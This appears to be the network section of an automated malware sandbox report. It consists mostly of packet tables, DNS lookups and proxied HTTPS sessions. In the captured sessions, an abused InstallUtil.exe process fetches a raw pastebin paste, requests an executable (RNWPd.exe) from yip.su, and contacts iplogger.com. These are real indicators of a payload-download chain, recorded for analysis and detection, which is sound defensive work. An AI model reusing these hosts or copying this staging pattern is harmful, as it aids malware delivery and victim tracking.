Aug 11, 2024 11:22:48.031125069 CEST	443	49733	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:48.491183043 CEST	443	49733	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:48.492727041 CEST	49733	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:48.492741108 CEST	443	49733	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:48.611150026 CEST	443	49733	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:48.611195087 CEST	443	49733	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:48.611222029 CEST	443	49733	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:48.611246109 CEST	443	49733	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:48.611316919 CEST	443	49733	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:48.611349106 CEST	49733	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:48.611476898 CEST	49733	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:48.611802101 CEST	49733	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:48.634265900 CEST	49734	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:48.634316921 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:48.634413004 CEST	49734	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:48.634637117 CEST	49734	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:48.634648085 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:49.128074884 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:49.129518986 CEST	49734	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:49.129539013 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:49.263483047 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:49.263581991 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:49.263602018 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:49.263629913 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:49.263654947 CEST	49734	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:49.263658047 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:49.263680935 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:49.263695955 CEST	49734	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:49.263726950 CEST	49734	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:49.264189959 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:49.264458895 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:49.264512062 CEST	49734	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:49.264519930 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:49.268874884 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:49.268903971 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:49.268959999 CEST	49734	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:49.268981934 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:49.269023895 CEST	49734	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:49.355752945 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:49.355870962 CEST	443	49734	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:49.356019974 CEST	49734	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:49.356499910 CEST	49734	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:53.748585939 CEST	49735	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:53.748624086 CEST	443	49735	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:53.748729944 CEST	49735	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:53.749070883 CEST	49735	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:53.749079943 CEST	443	49735	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:54.213135958 CEST	443	49735	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:54.214881897 CEST	49735	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:54.214920998 CEST	443	49735	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:54.339519978 CEST	443	49735	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:54.339575052 CEST	443	49735	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:54.339615107 CEST	443	49735	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:54.339644909 CEST	443	49735	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:54.339720964 CEST	443	49735	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:54.339831114 CEST	49735	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:54.339905024 CEST	49735	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:54.340675116 CEST	49735	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:54.359563112 CEST	49736	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:54.359651089 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:54.359905005 CEST	49736	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:54.360011101 CEST	49736	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:54.360045910 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:54.820768118 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:54.822345972 CEST	49736	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:54.822402000 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:54.942253113 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:54.942362070 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:54.942395926 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:54.942440033 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:54.942472935 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:54.942478895 CEST	49736	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:54.942507982 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:54.942521095 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:54.942594051 CEST	49736	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:54.942698002 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:54.942754984 CEST	49736	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:54.942781925 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:54.942838907 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:54.942903042 CEST	49736	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:54.942918062 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:54.997683048 CEST	49736	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:54.997701883 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:55.028954983 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:55.029015064 CEST	49736	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:55.029028893 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:55.029058933 CEST	443	49736	188.114.97.3	192.168.2.7
Aug 11, 2024 11:22:55.029109955 CEST	49736	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:55.029340029 CEST	49736	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:22:59.676791906 CEST	49737	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:59.676805019 CEST	443	49737	172.67.19.24	192.168.2.7
Aug 11, 2024 11:22:59.676908016 CEST	49737	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:59.677253008 CEST	49737	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:22:59.677261114 CEST	443	49737	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:00.132813931 CEST	443	49737	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:00.134294987 CEST	49737	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:23:00.134315968 CEST	443	49737	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:00.268205881 CEST	443	49737	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:00.268274069 CEST	443	49737	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:00.268318892 CEST	49737	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:23:00.268326044 CEST	443	49737	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:00.268372059 CEST	443	49737	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:00.268414974 CEST	49737	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:23:00.268419027 CEST	443	49737	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:00.268492937 CEST	443	49737	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:00.268578053 CEST	49737	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:23:00.268817902 CEST	49737	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:23:00.292049885 CEST	49738	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:00.292138100 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.292239904 CEST	49738	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:00.292457104 CEST	49738	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:00.292507887 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.749214888 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.751230955 CEST	49738	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:00.751266956 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.878586054 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.878705978 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.878742933 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.878787994 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.878793001 CEST	49738	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:00.878822088 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.878873110 CEST	49738	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:00.878887892 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.878928900 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.878978968 CEST	49738	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:00.878990889 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.879053116 CEST	49738	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:00.879107952 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.879203081 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.879235029 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.879264116 CEST	49738	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:00.879276991 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.879389048 CEST	49738	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:00.965110064 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.965287924 CEST	443	49738	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:00.965384960 CEST	49738	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:00.965657949 CEST	49738	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:05.405379057 CEST	49739	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:23:05.405436993 CEST	443	49739	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:05.405519962 CEST	49739	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:23:05.406100035 CEST	49739	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:23:05.406120062 CEST	443	49739	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:05.867964983 CEST	443	49739	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:05.869915962 CEST	49739	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:23:05.869946003 CEST	443	49739	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:05.990906954 CEST	443	49739	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:05.990959883 CEST	443	49739	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:05.990993023 CEST	443	49739	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:05.991029978 CEST	443	49739	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:05.991067886 CEST	49739	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:23:05.991101027 CEST	443	49739	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:05.991131067 CEST	443	49739	172.67.19.24	192.168.2.7
Aug 11, 2024 11:23:05.991138935 CEST	49739	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:23:05.991183043 CEST	49739	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:23:05.991791010 CEST	49739	443	192.168.2.7	172.67.19.24
Aug 11, 2024 11:23:06.012192011 CEST	49740	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:06.012232065 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.012351990 CEST	49740	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:06.012583971 CEST	49740	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:06.012609005 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.500953913 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.502352953 CEST	49740	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:06.502419949 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.634497881 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.634598970 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.634634972 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.634669065 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.634757996 CEST	49740	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:06.634757996 CEST	49740	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:06.634821892 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.635324955 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.635381937 CEST	49740	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:06.635399103 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.635596037 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.635636091 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.635654926 CEST	49740	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:06.635673046 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.635720968 CEST	49740	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:06.635730982 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.685261965 CEST	49740	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:06.685271978 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.726712942 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.726780891 CEST	49740	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:06.726794958 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.726814985 CEST	443	49740	188.114.97.3	192.168.2.7
Aug 11, 2024 11:23:06.726867914 CEST	49740	443	192.168.2.7	188.114.97.3
Aug 11, 2024 11:23:06.727169991 CEST	49740	443	192.168.2.7	188.114.97.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 11, 2024 11:21:43.062424898 CEST	63830	53	192.168.2.7	1.1.1.1
Aug 11, 2024 11:21:43.069679976 CEST	53	63830	1.1.1.1	192.168.2.7
Aug 11, 2024 11:21:43.939610958 CEST	57649	53	192.168.2.7	1.1.1.1
Aug 11, 2024 11:21:43.951071024 CEST	53	57649	1.1.1.1	192.168.2.7
Aug 11, 2024 11:21:54.764353991 CEST	61867	53	192.168.2.7	1.1.1.1
Aug 11, 2024 11:21:54.771730900 CEST	53	61867	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 11, 2024 11:21:43.062424898 CEST	192.168.2.7	1.1.1.1	0x62d2	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Aug 11, 2024 11:21:43.939610958 CEST	192.168.2.7	1.1.1.1	0xa2b0	Standard query (0)	yip.su	A (IP address)	IN (0x0001)	false
Aug 11, 2024 11:21:54.764353991 CEST	192.168.2.7	1.1.1.1	0xfbe8	Standard query (0)	iplogger.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Aug 11, 2024 11:21:43.069679976 CEST	1.1.1.1	192.168.2.7	0x62d2	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false
Aug 11, 2024 11:21:43.069679976 CEST	1.1.1.1	192.168.2.7	0x62d2	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false
Aug 11, 2024 11:21:43.069679976 CEST	1.1.1.1	192.168.2.7	0x62d2	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false
Aug 11, 2024 11:21:43.951071024 CEST	1.1.1.1	192.168.2.7	0xa2b0	No error (0)	yip.su	188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 11, 2024 11:21:43.951071024 CEST	1.1.1.1	192.168.2.7	0xa2b0	No error (0)	yip.su	188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 11, 2024 11:21:54.771730900 CEST	1.1.1.1	192.168.2.7	0xfbe8	No error (0)	iplogger.com	172.67.188.178	A (IP address)	IN (0x0001)	false
Aug 11, 2024 11:21:54.771730900 CEST	1.1.1.1	192.168.2.7	0xfbe8	No error (0)	iplogger.com	104.21.76.57	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

yip.su

iplogger.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49709	172.67.19.24	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:21:43 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-08-11 09:21:43 UTC	222	IN	HTTP/1.1 200 OK Date: Sun, 11 Aug 2024 09:21:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8b1728383f837cea-EWR
2024-08-11 09:21:43 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-11 09:21:43 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-08-11 09:21:43 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-08-11 09:21:43 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-08-11 09:21:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49710	188.114.97.3	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:21:44 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-08-11 09:21:44 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Sun, 11 Aug 2024 09:21:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-08-11 09:21:44 UTC	681	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 52 76 56 6a 44 76 6e 51 46 63 65 36 61 45 44 2b 64 78 55 72 41 2f 76 33 51 68 65 74 68 2b 39 74 68 70 52 4b 53 31 45 58 59 6b 32 4b 48 56 2f 45 34 62 48 62 72 47 4b 47 33 73 5a 6d 70 55 62 4c 73 63 63 42 65 63 65 2b 72 58 6f 75 6c 30 70 5a 71 32 4c 53 68 67 70 65 6d 6a 42 32 34 58 6b 68 6c 64 4d 31 68 68 61 54 2b 76 67 3d 24 46 63 33 41 48 4a 4f 42 35 6d 46 77 50 42 46 50 4b 78 4e 74 52 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: RvVjDvnQFce6aED+dxUrA/v3Qheth+9thpRKS1EXYk2KHV/E4bHbrGKG3sZmpUbLsccBece+rXoul0pZq2LShgpemjB24XkhldM1hhaT+vg=$Fc3AHJOB5mFwPBFPKxNtRA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
